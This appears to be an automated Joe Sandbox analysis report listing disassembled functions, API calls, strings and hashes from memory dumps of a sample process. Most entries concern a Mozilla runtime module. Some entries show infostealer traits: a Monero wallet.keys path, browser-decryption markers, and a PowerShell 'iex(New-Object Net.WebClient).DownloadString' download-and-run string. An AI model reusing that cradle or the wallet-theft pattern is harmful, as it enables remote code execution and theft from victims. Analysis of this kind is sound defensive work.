Part of subcall function 6C5F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C5F9508

GetCurrentThreadId.KERNEL32 ref: 6C5FF577
AcquireSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5FF585
ReleaseSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5FF5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C5FF3A8
[I %d/%d] profiler_resume, xrefs: 6C5FF239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C5FF56A
[I %d/%d] profiler_resume_sampling, xrefs: 6C5FF499

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 9ca54fbf8f9a7d77de184f03f7b17cb761039287091808734ef36b355a37ea0c
Instruction ID: 1848514dcdeb9820ee78e19329ebbb57366585d08c269c4796034b848c66d6fc
Opcode Fuzzy Hash: 9ca54fbf8f9a7d77de184f03f7b17cb761039287091808734ef36b355a37ea0c
Instruction Fuzzy Hash: FAF090762006149BDB106F6A9C8895A77BCEFC639DF002455FA0983743CB314C068B69

Function 6C5F05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C5ECFAE,?,?,?,6C5B31A7), ref: 6C5F05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C5ECFAE,?,?,?,6C5B31A7), ref: 6C5F0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C5B31A7), ref: 6C5F061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C5B31A7), ref: 6C5F0627

Strings

<jemalloc>, xrefs: 6C5F05FA, 6C5F060F
: (malloc) Error in VirtualFree(), xrefs: 6C5F061B, 6C5F0625

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 2da33d14e7d200baef450d9e3b7a0508c8586f21d9e239cb3f3ca084f6e8c92b
Instruction ID: a60dae9c6def397870168fa20fdeadc377d49bb7b3802cec87fd9a9057cc31f3
Opcode Fuzzy Hash: 2da33d14e7d200baef450d9e3b7a0508c8586f21d9e239cb3f3ca084f6e8c92b
Instruction Fuzzy Hash: EFE08CE2A0105037F6142256AC86DFB765CDBC6234F080039FE0E83301E94EED1A55FA

Function 6C5C05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: defc3a9642be20c6416f1c6778d38edcc3dfb0f0a7b450cb599de53a4e47751e
Instruction ID: b9773d29432d5f6708f8de56df7b382d8da9c415c8a124983dea234ae63fbe21
Opcode Fuzzy Hash: defc3a9642be20c6416f1c6778d38edcc3dfb0f0a7b450cb599de53a4e47751e
Instruction Fuzzy Hash: 61A149B0A00645CFDB24CF69C994A99FBF1BF89304F44866ED44A97B00E770A955CF91

Function 6C6114A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6114C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6114E2
GetCurrentThreadId.KERNEL32 ref: 6C611546
InitializeConditionVariable.KERNEL32(?), ref: 6C6115BA
free.MOZGLUE(?), ref: 6C6116B4

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 95d84662b94dfb401940ed2479e97d5f0c0b45dd623af9c279196d22ce1558d2
Instruction ID: e3f7843fdeaca22aea222bd4167b118c0f4b4ca9c48c72e530df89a86c12ad2d
Opcode Fuzzy Hash: 95d84662b94dfb401940ed2479e97d5f0c0b45dd623af9c279196d22ce1558d2
Instruction Fuzzy Hash: 3061F171A04710DBDB219F29C880BDE77B0BF8A309F44951CED8A57B02DB31E949CB99

Function 6C60DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C60DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C60D38A,?), ref: 6C60DC6F
free.MOZGLUE(?,?,?,?,?,6C60D38A,?), ref: 6C60DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C60D38A,?), ref: 6C60DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C60D38A,?), ref: 6C60DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C60D38A,?), ref: 6C60DD4A

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 451e115e3838a7843e8d0cea4f9abfce0817747ed82faaf876dffa1365ad1e7b
Instruction ID: b4cc91fdd8cbbe6d538c47e65ca479cdc624457572880972aa0929eeb8d44a8e
Opcode Fuzzy Hash: 451e115e3838a7843e8d0cea4f9abfce0817747ed82faaf876dffa1365ad1e7b
Instruction Fuzzy Hash: 3B4157B5B00605CFCB04CF99C980A9AB7F5FF89318B554569DA05ABB11D771FC00CB94

Function 6C5EF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C5EF480

Part of subcall function 6C5BF100: LoadLibraryW.KERNEL32(shell32,?,6C62D020), ref: 6C5BF122
Part of subcall function 6C5BF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C5BF132

CloseHandle.KERNEL32(00000000), ref: 6C5EF555

Part of subcall function 6C5C14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C5C1248,6C5C1248,?), ref: 6C5C14C9
Part of subcall function 6C5C14B0: memcpy.VCRUNTIME140(?,6C5C1248,00000000,?,6C5C1248,?), ref: 6C5C14EF

Part of subcall function 6C5BEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C5BEEE3

CreateFileW.KERNEL32 ref: 6C5EF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C5EF523

Strings

\oleacc.dll, xrefs: 6C5EF4CB

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: ce322f88c2c167cbf2f23531fab06003fa981028f94199fae543ff029cd55846
Instruction ID: cdefb9ac31cb9644bf9a6552c1873fb3b0ade02ac68695e8f11d63ea0dcb8ce5
Opcode Fuzzy Hash: ce322f88c2c167cbf2f23531fab06003fa981028f94199fae543ff029cd55846
Instruction Fuzzy Hash: 0D41CD316087109FE720DF69DC84A9BB7F4AF98318F101B1DF5A593690EB70E949CB92

Function 00262C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

ShellExecuteEx.SHELL32(0000003C), ref: 00262D85

Strings

')", xrefs: 00262CB3
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00262CC4
<, xrefs: 00262D39
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00262D04

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 70356c1dce3597035b12cad2c0cb0e50b5ae0a7fc29dd5368650c604ac90066e
Instruction ID: 4baa84448fc4c233f9b37195a0fe9d41dd30afabb318c6444f3227678bc871ab
Opcode Fuzzy Hash: 70356c1dce3597035b12cad2c0cb0e50b5ae0a7fc29dd5368650c604ac90066e
Instruction Fuzzy Hash: C341AF71D20248DADB18FFA0C896BEDB774AF14300F504129F516B7191DF746AAACF92

Function 6C6174A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C617526
__Init_thread_footer.LIBCMT ref: 6C617566
__Init_thread_footer.LIBCMT ref: 6C617597

Strings

UnmapViewOfFile2, xrefs: 6C617552
kernel32.dll, xrefs: 6C617557

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: ed444660479a17a8ed76fe915a08ce0ddf50dd74b7accb7319dc3ab776b95ea5
Instruction ID: dabde184573131af5baa6631ba4acc6dade4c92214c1b8abf9e0ebf2f6eea18a
Opcode Fuzzy Hash: ed444660479a17a8ed76fe915a08ce0ddf50dd74b7accb7319dc3ab776b95ea5
Instruction Fuzzy Hash: 58210A31708511E7DB24DFAFEC98E993775EB8732AF046569D40D87F40CB31A805899E

Function 6C61C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C61C0E9), ref: 6C61C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C61C437
FreeLibrary.KERNEL32(?,6C61C0E9), ref: 6C61C44C

Strings

ntdll.dll, xrefs: 6C61C413
NtQueryVirtualMemory, xrefs: 6C61C431

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: e0298329c0f9510b6786ddd77d0e945f7ddb990dec7b1771999e3421aae5891a
Instruction ID: 49dcc562e1e9156f9de8351582dea7a9d3c9d6bfa6358c7bec2e0caadb23e4ac
Opcode Fuzzy Hash: e0298329c0f9510b6786ddd77d0e945f7ddb990dec7b1771999e3421aae5891a
Instruction Fuzzy Hash: AFE04F70708300ABDF247F3BC988B157FF8A746345F007165AE0D81650DBB4C0058B0E

Function 6C6175B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C61748B,?), ref: 6C6175B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6175D7
FreeLibrary.KERNEL32(?,6C61748B,?), ref: 6C6175EC

Strings

ntdll.dll, xrefs: 6C6175B3
RtlNtStatusToDosError, xrefs: 6C6175D1

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 160a39b4637d5b23406ab0abbf432a074b7b82d84780fc2a6250a1d13e2a2da4
Instruction ID: c53374d9a786420735d0eb85fd8172bf9d2326b2a47b8aec7494439d75292f3e
Opcode Fuzzy Hash: 160a39b4637d5b23406ab0abbf432a074b7b82d84780fc2a6250a1d13e2a2da4
Instruction Fuzzy Hash: DBE09A71704711ABDB205FABDDCC7017AF8E746355F107066AA0DD1A50DBB580468F5D

Function 00259E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00259F41

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00259E67
@, xrefs: 00259EF1
v20, xrefs: 00259E21
v10, xrefs: 00259EA3

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: 21f1558e4d990781de7cc2559431b413a17c481207d992056c3aaa552378f41f
Instruction ID: 0f291ed15e88750761a8638ccdfdb2b90fec61f3bacf63e7703cd751e28fa32a
Opcode Fuzzy Hash: 21f1558e4d990781de7cc2559431b413a17c481207d992056c3aaa552378f41f
Instruction Fuzzy Hash: 00614E71A20248EFDB14EFA4CC96FED7775AF55300F408118F90A6B181EB706A69CF96

Function 6C5B4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C5B4E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C5B4E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5B4EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5B4F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C5B4F1E

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 6f85c076b3a04827ffcdfeab30d8d6d16ee3cc5b1953f81283184ec63c55479a
Instruction ID: d8d0383de2e66e38c2ff9f812d919ee93323c5e4cabbbe0a139f77f9281d85d6
Opcode Fuzzy Hash: 6f85c076b3a04827ffcdfeab30d8d6d16ee3cc5b1953f81283184ec63c55479a
Instruction Fuzzy Hash: 0C41CC71608701DFC725CF29C8A095BBBE4BF89344F108A2DF966A7741DB30E958CB92

Function 6C5C1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C5C152B,?,?,?,?,6C5C1248,?), ref: 6C5C159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C5C152B,?,?,?,?,6C5C1248,?), ref: 6C5C15BC
moz_xmalloc.MOZGLUE(-00000001,?,6C5C152B,?,?,?,?,6C5C1248,?), ref: 6C5C15E7
free.MOZGLUE(?,?,?,?,?,?,6C5C152B,?,?,?,?,6C5C1248,?), ref: 6C5C1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C5C152B,?,?,?,?,6C5C1248,?), ref: 6C5C1637

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: cb2ea17f7b177b9d11d41f2ac06a18eb5692c033a9018fb0b2fc1cc348976f98
Instruction ID: 924211e3952fbe771e78f36f348ff87cfc75910438655b9d95339699b7e1f053
Opcode Fuzzy Hash: cb2ea17f7b177b9d11d41f2ac06a18eb5692c033a9018fb0b2fc1cc348976f98
Instruction Fuzzy Hash: 4831D672B00114CBCB18DEB8DC5046F77A9EB813647250B6DE423DBBD4EB30D9558B92

Function 6C61AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C62E330,?,6C5DC059), ref: 6C61AD9D

Part of subcall function 6C5CCA10: malloc.MOZGLUE(?), ref: 6C5CCA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C62E330,?,6C5DC059), ref: 6C61ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C62E330,?,6C5DC059), ref: 6C61AE01
GetLastError.KERNEL32(?,00000000,?,?,6C62E330,?,6C5DC059), ref: 6C61AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C62E330,?,6C5DC059), ref: 6C61AE3D

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
